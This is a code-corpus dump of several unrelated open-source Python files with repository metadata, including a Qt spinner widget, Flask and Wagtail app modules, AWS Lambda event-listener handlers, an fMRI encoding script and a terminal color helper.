        if not self._timer.isActive():
            self._timer.start()
            self._currentCounter = 0

    def stop(self):
        """Hide the spinner, re-enable the parent, stop the timer."""
        self._isSpinning = False
        self.hide()
        if self.parentWidget() and self._disableParentWhenSpinning:
            self.parentWidget().setEnabled(True)
        if self._timer.isActive():
            self._timer.stop()
            self._currentCounter = 0

    def setNumberOfLines(self, lines):
        """Set the number of lines in the ring and restart the cycle."""
        self._numberOfLines = lines
        self._currentCounter = 0
        self.updateTimer()

    def setLineLength(self, length):
        self._lineLength = length
        self.updateSize()

    def setLineWidth(self, width):
        self._lineWidth = width
        self.updateSize()

    def setInnerRadius(self, radius):
        self._innerRadius = radius
        self.updateSize()

    def color(self):
        return self._color

    def roundness(self):
        return self._roundness

    def minimumTrailOpacity(self):
        return self._minimumTrailOpacity

    def trailFadePercentage(self):
        return self._trailFadePercentage

    def revolutionsPersSecond(self):
        # NOTE(review): typo "Pers" kept — renaming would break callers.
        return self._revolutionsPerSecond

    def numberOfLines(self):
        return self._numberOfLines

    def lineLength(self):
        return self._lineLength

    def isTrailSizeDecreasing(self):
        """
        Return whether the length and thickness of the trailing lines
        are decreasing.
        """
        return self._trailSizeDecreasing

    def lineWidth(self):
        return self._lineWidth

    def innerRadius(self):
        return self._innerRadius

    def isSpinning(self):
        return self._isSpinning

    def setRoundness(self, roundness):
        # Clamp to the [0, 100] range QPainter.drawRoundedRect expects
        # with Qt.RelativeSize.
        self._roundness = max(0.0, min(100.0, roundness))

    def setColor(self, color=Qt.black):
        self._color = QColor(color)

    def setRevolutionsPerSecond(self, revolutionsPerSecond):
        self._revolutionsPerSecond = revolutionsPerSecond
        self.updateTimer()

    def setTrailFadePercentage(self, trail):
        self._trailFadePercentage = trail

    def setTrailSizeDecreasing(self, value):
        """
        Set whether the length and thickness of the trailing lines
        are decreasing.
        """
        self._trailSizeDecreasing = value

    def setMinimumTrailOpacity(self, minimumTrailOpacity):
        self._minimumTrailOpacity = minimumTrailOpacity

    def rotate(self):
        """Advance the primary line one step and schedule a repaint."""
        self._currentCounter += 1
        if self._currentCounter >= self._numberOfLines:
            self._currentCounter = 0
        self.update()

    def updateSize(self):
        """Fix the widget to the square bounding box of the spinner."""
        size = int((self._innerRadius + self._lineLength) * 2)
        self.setFixedSize(size, size)

    def updateTimer(self):
        # One timer tick per line per revolution.
        self._timer.setInterval(int(1000 / (self._numberOfLines *
                                            self._revolutionsPerSecond)))

    def updatePosition(self):
        """Center the spinner on its parent widget when requested."""
        if self.parentWidget() and self._centerOnParent:
            self.move(int(self.parentWidget().width() / 2 -
                          self.width() / 2),
                      int(self.parentWidget().height() / 2 -
                          self.height() / 2))

    def lineCountDistanceFromPrimary(self, current, primary, totalNrOfLines):
        """Return how many steps behind the primary line `current` is (mod total)."""
        distance = primary - current
        if distance < 0:
            distance += totalNrOfLines
        return distance

    def currentLineColor(self, countDistance, totalNrOfLines, trailFadePerc,
                         minOpacity, colorinput):
        """Return `colorinput` with alpha faded according to trail distance."""
        color = QColor(colorinput)
        if countDistance == 0:
            return color
        minAlphaF = minOpacity / 100.0
        distanceThreshold = int(
            math.ceil((totalNrOfLines - 1) * trailFadePerc / 100.0))
        if countDistance > distanceThreshold:
            color.setAlphaF(minAlphaF)
        else:
            alphaDiff = color.alphaF() - minAlphaF
            gradient = alphaDiff / float(distanceThreshold + 1)
            resultAlpha = color.alphaF() - gradient * countDistance
            # If alpha is out of bounds, clip it.
            resultAlpha = min(1.0, max(0.0, resultAlpha))
            color.setAlphaF(resultAlpha)
        return color
| 34.368627
| 105
| 0.655294
|
import math
from qtpy.QtCore import QRect, Qt, QTimer
from qtpy.QtGui import QColor, QPainter
from qtpy.QtWidgets import QWidget
class QWaitingSpinner(QWidget):
def __init__(self, parent, centerOnParent=True,
disableParentWhenSpinning=False, modality=Qt.NonModal):
QWidget.__init__(self, parent)
self._centerOnParent = centerOnParent
self._disableParentWhenSpinning = disableParentWhenSpinning
self._color = QColor(Qt.black)
self._roundness = 100.0
self._minimumTrailOpacity = 3.14159265358979323846
self._trailFadePercentage = 80.0
self._trailSizeDecreasing = False
self._revolutionsPerSecond = 1.57079632679489661923
self._numberOfLines = 20
self._lineLength = 10
self._lineWidth = 2
self._innerRadius = 10
self._currentCounter = 0
self._isSpinning = False
self._timer = QTimer(self)
self._timer.timeout.connect(self.rotate)
self.updateSize()
self.updateTimer()
self.hide()
self.setWindowModality(modality)
self.setAttribute(Qt.WA_TranslucentBackground)
def paintEvent(self, QPaintEvent):
self.updatePosition()
painter = QPainter(self)
painter.fillRect(self.rect(), Qt.transparent)
painter.setRenderHint(QPainter.Antialiasing, True)
if self._currentCounter >= self._numberOfLines:
self._currentCounter = 0
painter.setPen(Qt.NoPen)
for i in range(0, self._numberOfLines):
painter.save()
painter.translate(self._innerRadius + self._lineLength, self._innerRadius + self._lineLength)
rotateAngle = float(360 * i) / float(self._numberOfLines)
painter.rotate(rotateAngle)
painter.translate(self._innerRadius, 0)
distance = self.lineCountDistanceFromPrimary(i, self._currentCounter, self._numberOfLines)
color = self.currentLineColor(distance, self._numberOfLines, self._trailFadePercentage,
self._minimumTrailOpacity, self._color)
if self._trailSizeDecreasing:
sf = (self._numberOfLines - distance) / self._numberOfLines
else:
sf = 1
painter.setBrush(color)
rect = QRect(0, round(-self._lineWidth / 2),
round(sf * self._lineLength),
round(sf * self._lineWidth))
painter.drawRoundedRect(
rect, self._roundness, self._roundness, Qt.RelativeSize)
painter.restore()
def start(self):
self.updatePosition()
self._isSpinning = True
self.show()
if self.parentWidget and self._disableParentWhenSpinning:
self.parentWidget().setEnabled(False)
if not self._timer.isActive():
self._timer.start()
self._currentCounter = 0
def stop(self):
self._isSpinning = False
self.hide()
if self.parentWidget() and self._disableParentWhenSpinning:
self.parentWidget().setEnabled(True)
if self._timer.isActive():
self._timer.stop()
self._currentCounter = 0
def setNumberOfLines(self, lines):
self._numberOfLines = lines
self._currentCounter = 0
self.updateTimer()
def setLineLength(self, length):
self._lineLength = length
self.updateSize()
def setLineWidth(self, width):
self._lineWidth = width
self.updateSize()
def setInnerRadius(self, radius):
self._innerRadius = radius
self.updateSize()
def color(self):
return self._color
def roundness(self):
return self._roundness
def minimumTrailOpacity(self):
return self._minimumTrailOpacity
def trailFadePercentage(self):
return self._trailFadePercentage
def revolutionsPersSecond(self):
return self._revolutionsPerSecond
def numberOfLines(self):
return self._numberOfLines
def lineLength(self):
return self._lineLength
def isTrailSizeDecreasing(self):
return self._trailSizeDecreasing
def lineWidth(self):
return self._lineWidth
def innerRadius(self):
return self._innerRadius
def isSpinning(self):
return self._isSpinning
def setRoundness(self, roundness):
self._roundness = max(0.0, min(100.0, roundness))
def setColor(self, color=Qt.black):
self._color = QColor(color)
def setRevolutionsPerSecond(self, revolutionsPerSecond):
self._revolutionsPerSecond = revolutionsPerSecond
self.updateTimer()
def setTrailFadePercentage(self, trail):
self._trailFadePercentage = trail
def setTrailSizeDecreasing(self, value):
self._trailSizeDecreasing = value
def setMinimumTrailOpacity(self, minimumTrailOpacity):
self._minimumTrailOpacity = minimumTrailOpacity
def rotate(self):
self._currentCounter += 1
if self._currentCounter >= self._numberOfLines:
self._currentCounter = 0
self.update()
def updateSize(self):
size = int((self._innerRadius + self._lineLength) * 2)
self.setFixedSize(size, size)
def updateTimer(self):
self._timer.setInterval(int(1000 / (self._numberOfLines *
self._revolutionsPerSecond)))
def updatePosition(self):
if self.parentWidget() and self._centerOnParent:
self.move(int(self.parentWidget().width() / 2 -
self.width() / 2),
int(self.parentWidget().height() / 2 -
self.height() / 2))
def lineCountDistanceFromPrimary(self, current, primary, totalNrOfLines):
distance = primary - current
if distance < 0:
distance += totalNrOfLines
return distance
def currentLineColor(self, countDistance, totalNrOfLines, trailFadePerc, minOpacity, colorinput):
color = QColor(colorinput)
if countDistance == 0:
return color
minAlphaF = minOpacity / 100.0
distanceThreshold = int(math.ceil((totalNrOfLines - 1) * trailFadePerc / 100.0))
if countDistance > distanceThreshold:
color.setAlphaF(minAlphaF)
else:
alphaDiff = color.alphaF() - minAlphaF
gradient = alphaDiff / float(distanceThreshold + 1)
resultAlpha = color.alphaF() - gradient * countDistance
resultAlpha = min(1.0, max(0.0, resultAlpha))
color.setAlphaF(resultAlpha)
return color
| true
| true
|
f71926594989831bd3fe9b4bdf47da2f462f2958
| 91
|
py
|
Python
|
app/main/__init__.py
|
gichimux/news_highlight_0.1
|
c085db3b80944bc18960b4896c7cb8d2a15bd305
|
[
"MIT"
] | 1
|
2019-03-21T03:06:29.000Z
|
2019-03-21T03:06:29.000Z
|
app/main/__init__.py
|
gichimux/news_highlight_0.1
|
c085db3b80944bc18960b4896c7cb8d2a15bd305
|
[
"MIT"
] | null | null | null |
app/main/__init__.py
|
gichimux/news_highlight_0.1
|
c085db3b80944bc18960b4896c7cb8d2a15bd305
|
[
"MIT"
] | 1
|
2020-04-03T02:36:34.000Z
|
2020-04-03T02:36:34.000Z
|
from flask import Blueprint
main = Blueprint('main', __name__)
from . import views,errors
| 18.2
| 34
| 0.769231
|
from flask import Blueprint
main = Blueprint('main', __name__)
from . import views,errors
| true
| true
|
f7192710ad408630f6ee5b7d502e00787c41b0a8
| 2,222
|
py
|
Python
|
event_pubsub/handlers/event_listener_handlers.py
|
anandrgitnirman/snet-marketplace-service
|
f31bf741094476b9cb26277f1165deb2856257b1
|
[
"MIT"
] | null | null | null |
event_pubsub/handlers/event_listener_handlers.py
|
anandrgitnirman/snet-marketplace-service
|
f31bf741094476b9cb26277f1165deb2856257b1
|
[
"MIT"
] | null | null | null |
event_pubsub/handlers/event_listener_handlers.py
|
anandrgitnirman/snet-marketplace-service
|
f31bf741094476b9cb26277f1165deb2856257b1
|
[
"MIT"
] | null | null | null |
import sys
sys.path.append('/opt')
from common.logger import get_logger
from common.utils import handle_exception_with_slack_notification
from common.exception_handler import exception_handler
from event_pubsub.config import NETWORK_ID, SLACK_HOOK
from event_pubsub.listeners.event_listeners import MPEEventListener, RFAIEventListener, RegistryEventListener, \
TokenStakeEventListener, AirdropEventListener, OccamAirdropEventListener, ConverterAGIXEventListener, \
ConverterNTXEventListener
logger = get_logger(__name__)
@handle_exception_with_slack_notification(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def registry_event_listener_handler(event, context):
RegistryEventListener().listen_and_publish_registry_events()
@handle_exception_with_slack_notification(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def mpe_event_listener_handler(event, context):
MPEEventListener().listen_and_publish_mpe_events()
@handle_exception_with_slack_notification(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def rfai_event_listener_handler(event, context):
RFAIEventListener().listen_and_publish_rfai_events()
@exception_handler(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def token_stake_event_listener_handler(event, context):
TokenStakeEventListener().listen_and_publish_token_stake_events()
@exception_handler(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def airdrop_event_listener_handler(event, context):
AirdropEventListener().listen_and_publish_airdrop_events()
@exception_handler(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def occam_airdrop_event_listener_handler(event, context):
OccamAirdropEventListener().listen_and_publish_occam_airdrop_events()
@exception_handler(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def converter_agix_event_listener_handler(event, context):
ConverterAGIXEventListener().listen_and_publish_converter_agix_events()
@exception_handler(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def converter_ntx_event_listener_handler(event, context):
ConverterNTXEventListener().listen_and_publish_converter_ntx_events()
| 42.730769
| 112
| 0.860036
|
import sys
sys.path.append('/opt')
from common.logger import get_logger
from common.utils import handle_exception_with_slack_notification
from common.exception_handler import exception_handler
from event_pubsub.config import NETWORK_ID, SLACK_HOOK
from event_pubsub.listeners.event_listeners import MPEEventListener, RFAIEventListener, RegistryEventListener, \
TokenStakeEventListener, AirdropEventListener, OccamAirdropEventListener, ConverterAGIXEventListener, \
ConverterNTXEventListener
logger = get_logger(__name__)
@handle_exception_with_slack_notification(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def registry_event_listener_handler(event, context):
RegistryEventListener().listen_and_publish_registry_events()
@handle_exception_with_slack_notification(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def mpe_event_listener_handler(event, context):
MPEEventListener().listen_and_publish_mpe_events()
@handle_exception_with_slack_notification(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def rfai_event_listener_handler(event, context):
RFAIEventListener().listen_and_publish_rfai_events()
@exception_handler(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def token_stake_event_listener_handler(event, context):
TokenStakeEventListener().listen_and_publish_token_stake_events()
@exception_handler(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def airdrop_event_listener_handler(event, context):
AirdropEventListener().listen_and_publish_airdrop_events()
@exception_handler(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def occam_airdrop_event_listener_handler(event, context):
OccamAirdropEventListener().listen_and_publish_occam_airdrop_events()
@exception_handler(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def converter_agix_event_listener_handler(event, context):
ConverterAGIXEventListener().listen_and_publish_converter_agix_events()
@exception_handler(SLACK_HOOK=SLACK_HOOK, NETWORK_ID=NETWORK_ID, logger=logger)
def converter_ntx_event_listener_handler(event, context):
ConverterNTXEventListener().listen_and_publish_converter_ntx_events()
| true
| true
|
f71927526b4a5695020b5b175570366eb0a2f1d0
| 6,086
|
py
|
Python
|
analysis/baseline/s02_perform_encoding.py
|
eduardojdiniz/Buzznauts
|
8ac242a8d5309b4090a0f0b148ec275cac762bc0
|
[
"MIT"
] | 2
|
2021-08-03T15:07:04.000Z
|
2022-03-02T15:10:07.000Z
|
analysis/baseline/s02_perform_encoding.py
|
eduardojdiniz/Buzznauts
|
8ac242a8d5309b4090a0f0b148ec275cac762bc0
|
[
"MIT"
] | 8
|
2021-08-04T14:21:14.000Z
|
2021-08-16T21:07:12.000Z
|
analysis/baseline/s02_perform_encoding.py
|
eduardojdiniz/Buzznauts
|
8ac242a8d5309b4090a0f0b148ec275cac762bc0
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# coding=utf-8
import numpy as np
import os
import os.path as op
import argparse
import torch
from Buzznauts.utils import load_dict, saveasnii, get_fmri, set_device
from Buzznauts.analysis.baseline import get_activations, predict_fmri_fast
from tqdm import tqdm
def main():
description = 'Encoding model analysis for Algonauts 2021'
parser = argparse.ArgumentParser(description=description)
buzz_root = '/home/dinize@acct.upmchs.net/proj/Buzznauts'
baseline = op.join(buzz_root, 'models/baseline')
parser.add_argument('-rd', '--result_dir',
help='saves predicted fMRI activity',
default=op.join(baseline, 'results'),
type=str)
parser.add_argument('-ad', '--activations_dir',
help='directory containing DNN activations',
default=op.join(baseline, 'activations'),
type=str)
parser.add_argument('-model', '--model',
help='model under which predicted fMRI will be saved',
default='alexnet',
type=str)
_help = 'layer from which activations will be used to train & predict fMRI'
parser.add_argument('-l', '--layer',
help=_help,
default='layer_5',
type=str)
parser.add_argument(
'-sub', '--sub',
help='subject number from which fMRI data will be used',
default='sub04', type=str)
parser.add_argument('-r', '--roi',
help='brain region from which fMRI data will be used',
default='EBA',
type=str)
_help = 'test or val, val returns mean correlation ' + \
'by using 10% of training data for validation'
parser.add_argument('-m', '--mode',
help=_help,
default='val',
type=str)
parser.add_argument('-fd', '--fmri_dir',
help='directory containing fMRI activity',
default=op.join(buzz_root, 'data/fmri'),
type=str)
parser.add_argument('-v', '--visualize',
help='visualize whole brain in MNI space or not',
default=True,
type=bool)
_help = 'number of voxel to fit at one time in case of memory constraints'
parser.add_argument('-b', '--batch_size',
help=_help,
default=1000,
type=int)
args = vars(parser.parse_args())
mode = args['mode']
sub = args['sub']
ROI = args['roi']
model = args['model']
layer = args['layer']
visualize_results = args['visualize']
batch_size = args['batch_size']
device = set_device()
if ROI == "WB":
track = "full_track"
else:
track = "mini_track"
activations_dir = op.join(args['activations_dir'], 'pca_100')
fmri_dir = op.join(args['fmri_dir'], track)
sub_fmri_dir = op.join(fmri_dir, sub)
results_dir = op.join(args['result_dir'], model, layer, track, sub)
if not op.exists(results_dir):
os.makedirs(results_dir)
print("ROi is : ", ROI)
features_train, features_test = get_activations(activations_dir,
layer)
if track == "full_track":
fmri_train_all, voxel_mask = get_fmri(sub_fmri_dir, ROI)
else:
fmri_train_all = get_fmri(sub_fmri_dir, ROI)
num_voxels = fmri_train_all.shape[1]
if mode == 'val':
# Here as an example we use first 900 videos as training and rest of
# the videos as validation
features_test = features_train[900:, :]
features_train = features_train[:900, :]
fmri_train = fmri_train_all[:900, :]
fmri_test = fmri_train_all[900:, :]
pred_fmri = np.zeros_like(fmri_test)
pred_fmri_save_path = op.join(results_dir, ROI + '_val.npy')
else:
fmri_train = fmri_train_all
num_test_videos = 102
pred_fmri = np.zeros((num_test_videos, num_voxels))
pred_fmri_save_path = op.join(results_dir, ROI + '_test.npy')
print("number of voxels is ", num_voxels)
i = 0
with tqdm(total=100) as pbar:
while i < num_voxels - batch_size:
j = i + batch_size
pred_fmri[:, i:j] = predict_fmri_fast(features_train,
features_test,
fmri_train[:, i:j],
device=device)
i = j
pbar.update((100*i) // num_voxels)
pred_fmri[:, i:] = predict_fmri_fast(features_train,
features_test,
fmri_train[:, i:i + batch_size],
device=device)
if mode == 'val':
score = vectorized_correlation(fmri_test, pred_fmri)
print("Mean correlation for ROI : ", ROI, "in ", sub, " is :",
round(score.mean(), 6))
# result visualization for whole brain (full_track)
if track == "full_track" and visualize_results:
brain_mask = op.join(buzz_root, 'data/fmri/example.nii')
nii_save_path = op.join(results_dir, ROI + '_val.nii')
view_args = {'brain_mask': brain_mask,
'nii_save_path': nii_save_path,
'score': score,
'voxel_mask': voxel_mask}
view = visualize_activity_surf(sub, **view_args)
view_save_path = op.join(results_dir, ROI + '_val.html')
view.save_as_html(view_save_path)
print("Results saved in this directory: ", results_dir)
view.open_in_browser()
np.save(pred_fmri_save_path, pred_fmri)
print("ROI done : ", ROI)
if __name__ == "__main__":
main()
| 38.518987
| 79
| 0.544857
|
import numpy as np
import os
import os.path as op
import argparse
import torch
from Buzznauts.utils import load_dict, saveasnii, get_fmri, set_device
from Buzznauts.analysis.baseline import get_activations, predict_fmri_fast
from tqdm import tqdm
def main():
description = 'Encoding model analysis for Algonauts 2021'
parser = argparse.ArgumentParser(description=description)
buzz_root = '/home/dinize@acct.upmchs.net/proj/Buzznauts'
baseline = op.join(buzz_root, 'models/baseline')
parser.add_argument('-rd', '--result_dir',
help='saves predicted fMRI activity',
default=op.join(baseline, 'results'),
type=str)
parser.add_argument('-ad', '--activations_dir',
help='directory containing DNN activations',
default=op.join(baseline, 'activations'),
type=str)
parser.add_argument('-model', '--model',
help='model under which predicted fMRI will be saved',
default='alexnet',
type=str)
_help = 'layer from which activations will be used to train & predict fMRI'
parser.add_argument('-l', '--layer',
help=_help,
default='layer_5',
type=str)
parser.add_argument(
'-sub', '--sub',
help='subject number from which fMRI data will be used',
default='sub04', type=str)
parser.add_argument('-r', '--roi',
help='brain region from which fMRI data will be used',
default='EBA',
type=str)
_help = 'test or val, val returns mean correlation ' + \
'by using 10% of training data for validation'
parser.add_argument('-m', '--mode',
help=_help,
default='val',
type=str)
parser.add_argument('-fd', '--fmri_dir',
help='directory containing fMRI activity',
default=op.join(buzz_root, 'data/fmri'),
type=str)
parser.add_argument('-v', '--visualize',
help='visualize whole brain in MNI space or not',
default=True,
type=bool)
_help = 'number of voxel to fit at one time in case of memory constraints'
parser.add_argument('-b', '--batch_size',
help=_help,
default=1000,
type=int)
args = vars(parser.parse_args())
mode = args['mode']
sub = args['sub']
ROI = args['roi']
model = args['model']
layer = args['layer']
visualize_results = args['visualize']
batch_size = args['batch_size']
device = set_device()
if ROI == "WB":
track = "full_track"
else:
track = "mini_track"
activations_dir = op.join(args['activations_dir'], 'pca_100')
fmri_dir = op.join(args['fmri_dir'], track)
sub_fmri_dir = op.join(fmri_dir, sub)
results_dir = op.join(args['result_dir'], model, layer, track, sub)
if not op.exists(results_dir):
os.makedirs(results_dir)
print("ROi is : ", ROI)
features_train, features_test = get_activations(activations_dir,
layer)
if track == "full_track":
fmri_train_all, voxel_mask = get_fmri(sub_fmri_dir, ROI)
else:
fmri_train_all = get_fmri(sub_fmri_dir, ROI)
num_voxels = fmri_train_all.shape[1]
if mode == 'val':
features_test = features_train[900:, :]
features_train = features_train[:900, :]
fmri_train = fmri_train_all[:900, :]
fmri_test = fmri_train_all[900:, :]
pred_fmri = np.zeros_like(fmri_test)
pred_fmri_save_path = op.join(results_dir, ROI + '_val.npy')
else:
fmri_train = fmri_train_all
num_test_videos = 102
pred_fmri = np.zeros((num_test_videos, num_voxels))
pred_fmri_save_path = op.join(results_dir, ROI + '_test.npy')
print("number of voxels is ", num_voxels)
i = 0
with tqdm(total=100) as pbar:
while i < num_voxels - batch_size:
j = i + batch_size
pred_fmri[:, i:j] = predict_fmri_fast(features_train,
features_test,
fmri_train[:, i:j],
device=device)
i = j
pbar.update((100*i) // num_voxels)
pred_fmri[:, i:] = predict_fmri_fast(features_train,
features_test,
fmri_train[:, i:i + batch_size],
device=device)
if mode == 'val':
score = vectorized_correlation(fmri_test, pred_fmri)
print("Mean correlation for ROI : ", ROI, "in ", sub, " is :",
round(score.mean(), 6))
if track == "full_track" and visualize_results:
brain_mask = op.join(buzz_root, 'data/fmri/example.nii')
nii_save_path = op.join(results_dir, ROI + '_val.nii')
view_args = {'brain_mask': brain_mask,
'nii_save_path': nii_save_path,
'score': score,
'voxel_mask': voxel_mask}
view = visualize_activity_surf(sub, **view_args)
view_save_path = op.join(results_dir, ROI + '_val.html')
view.save_as_html(view_save_path)
print("Results saved in this directory: ", results_dir)
view.open_in_browser()
np.save(pred_fmri_save_path, pred_fmri)
print("ROI done : ", ROI)
if __name__ == "__main__":
main()
| true
| true
|
f719275c0f8f28584e41df42235876facf663976
| 2,395
|
py
|
Python
|
ayewa/views.py
|
JoanEliot/ayewa
|
e36128357564cb83938b2d7096b3fe75330dc948
|
[
"MIT"
] | null | null | null |
ayewa/views.py
|
JoanEliot/ayewa
|
e36128357564cb83938b2d7096b3fe75330dc948
|
[
"MIT"
] | null | null | null |
ayewa/views.py
|
JoanEliot/ayewa
|
e36128357564cb83938b2d7096b3fe75330dc948
|
[
"MIT"
] | null | null | null |
from django.conf import settings
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from django.shortcuts import render
from wagtail.core.models import Page
from wagtail.search.models import Query
from .models import ActionApproach, Resource, Solution, People
def search(request):
# Search
search_query = request.GET.get('q', None)
if search_query:
if 'elasticsearch' in settings.WAGTAILSEARCH_BACKENDS['default']['BACKEND']:
# In production, use ElasticSearch and a simplified search query, per
# http://docs.wagtail.io/en/v1.12.1/topics/search/backends.html
# like this:
search_results = Page.objects.live().search(search_query)
else:
# If we aren't using ElasticSearch for the demo, fall back to native db search.
# But native DB search can't search specific fields in our models on a `Page` query.
# So for demo purposes ONLY, we hard-code in the model names we want to search.
action_results = ActionApproach.objects.live().search(search_query)
action_page_ids = [p.page_ptr.id for p in action_results]
resource_results = Resource.objects.live().search(search_query)
resource_page_ids = [p.page_ptr.id for p in resource_results]
solution_results = Solution.objects.live().search(search_query)
solution_result_ids = [p.page_ptr.id for p in solution_results]
people_results = People.objects.live().search(search_query)
people_result_ids = [p.page_ptr.id for p in people_results]
page_ids = action_page_ids + resource_page_ids + solution_result_ids + people_result_ids
search_results = Page.objects.live().filter(id__in=page_ids)
query = Query.get(search_query)
# Record hit
query.add_hit()
else:
search_results = Page.objects.none()
# Pagination
page = request.GET.get('page', 1)
paginator = Paginator(search_results, 10)
try:
search_results = paginator.page(page)
except PageNotAnInteger:
search_results = paginator.page(1)
except EmptyPage:
search_results = paginator.page(paginator.num_pages)
return render(request, 'search/search_results.html', {
'search_query': search_query,
'search_results': search_results,
})
| 39.916667
| 100
| 0.681002
|
from django.conf import settings
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from django.shortcuts import render
from wagtail.core.models import Page
from wagtail.search.models import Query
from .models import ActionApproach, Resource, Solution, People
def search(request):
search_query = request.GET.get('q', None)
if search_query:
if 'elasticsearch' in settings.WAGTAILSEARCH_BACKENDS['default']['BACKEND']:
search_results = Page.objects.live().search(search_query)
else:
# But native DB search can't search specific fields in our models on a `Page` query.
action_results = ActionApproach.objects.live().search(search_query)
action_page_ids = [p.page_ptr.id for p in action_results]
resource_results = Resource.objects.live().search(search_query)
resource_page_ids = [p.page_ptr.id for p in resource_results]
solution_results = Solution.objects.live().search(search_query)
solution_result_ids = [p.page_ptr.id for p in solution_results]
people_results = People.objects.live().search(search_query)
people_result_ids = [p.page_ptr.id for p in people_results]
page_ids = action_page_ids + resource_page_ids + solution_result_ids + people_result_ids
search_results = Page.objects.live().filter(id__in=page_ids)
query = Query.get(search_query)
query.add_hit()
else:
search_results = Page.objects.none()
page = request.GET.get('page', 1)
paginator = Paginator(search_results, 10)
try:
search_results = paginator.page(page)
except PageNotAnInteger:
search_results = paginator.page(1)
except EmptyPage:
search_results = paginator.page(paginator.num_pages)
return render(request, 'search/search_results.html', {
'search_query': search_query,
'search_results': search_results,
})
| true
| true
|
f71928ded4483b24d811acaae516a6fa0a846be5
| 2,771
|
py
|
Python
|
lib/terminal.py
|
stevecotton/i18nspector
|
b9fa6f5c54341f8c7e82b48adb0de05376bab8e7
|
[
"MIT"
] | 1
|
2016-10-25T18:22:02.000Z
|
2016-10-25T18:22:02.000Z
|
lib/terminal.py
|
stevecotton/i18nspector
|
b9fa6f5c54341f8c7e82b48adb0de05376bab8e7
|
[
"MIT"
] | 8
|
2016-08-25T17:37:49.000Z
|
2022-02-17T20:47:31.000Z
|
lib/terminal.py
|
stevecotton/i18nspector
|
b9fa6f5c54341f8c7e82b48adb0de05376bab8e7
|
[
"MIT"
] | 3
|
2017-03-03T00:50:28.000Z
|
2021-08-17T16:43:25.000Z
|
# Copyright © 2012-2018 Jakub Wilk <jwilk@jwilk.net>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the “Software”), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
'''
color terminal support
'''
import functools
import re
class _dummy_curses:
@staticmethod
def tigetstr(*args, **kwargs):
del args, kwargs
return b''
@staticmethod
def tparm(*args, **kwargs):
del args, kwargs
return b''
_curses = _dummy_curses
class colors:
black = NotImplemented
red = NotImplemented
green = NotImplemented
yellow = NotImplemented
blue = NotImplemented
magenta = NotImplemented
cyan = NotImplemented
white = NotImplemented
_strip_delay = functools.partial(
re.compile(b'[$]<([0-9]*[.])?[0-9]+([/*]|[*][/])?>').sub,
b''
)
def attr_fg(i):
'''
returns a string that changes the foreground color
'''
s = _curses.tigetstr('setaf') or b''
s = _strip_delay(s)
if s: # work-around for https://bugs.debian.org/902630
s = _curses.tparm(s, i)
return s.decode()
def attr_reset():
'''
returns a string that resets all attributes
'''
s = _curses.tigetstr('sgr0') or b''
s = _strip_delay(s)
return s.decode()
def initialize():
'''
initialize the terminal
'''
global _curses # pylint: disable=global-statement
try:
import curses as _curses # pylint: disable=redefined-outer-name,import-outside-toplevel
except ImportError:
return
try:
_curses.setupterm()
except _curses.error:
_curses = _dummy_curses
return
for key, value in vars(_curses).items():
if key.startswith('COLOR_'):
key = key[6:].lower()
getattr(colors, key)
setattr(colors, key, value)
# vim:ts=4 sts=4 sw=4 et
| 28.864583
| 96
| 0.674125
|
import functools
import re
class _dummy_curses:
@staticmethod
def tigetstr(*args, **kwargs):
del args, kwargs
return b''
@staticmethod
def tparm(*args, **kwargs):
del args, kwargs
return b''
_curses = _dummy_curses
class colors:
black = NotImplemented
red = NotImplemented
green = NotImplemented
yellow = NotImplemented
blue = NotImplemented
magenta = NotImplemented
cyan = NotImplemented
white = NotImplemented
_strip_delay = functools.partial(
re.compile(b'[$]<([0-9]*[.])?[0-9]+([/*]|[*][/])?>').sub,
b''
)
def attr_fg(i):
s = _curses.tigetstr('setaf') or b''
s = _strip_delay(s)
if s:
s = _curses.tparm(s, i)
return s.decode()
def attr_reset():
s = _curses.tigetstr('sgr0') or b''
s = _strip_delay(s)
return s.decode()
def initialize():
global _curses
try:
import curses as _curses
except ImportError:
return
try:
_curses.setupterm()
except _curses.error:
_curses = _dummy_curses
return
for key, value in vars(_curses).items():
if key.startswith('COLOR_'):
key = key[6:].lower()
getattr(colors, key)
setattr(colors, key, value)
| true
| true
|
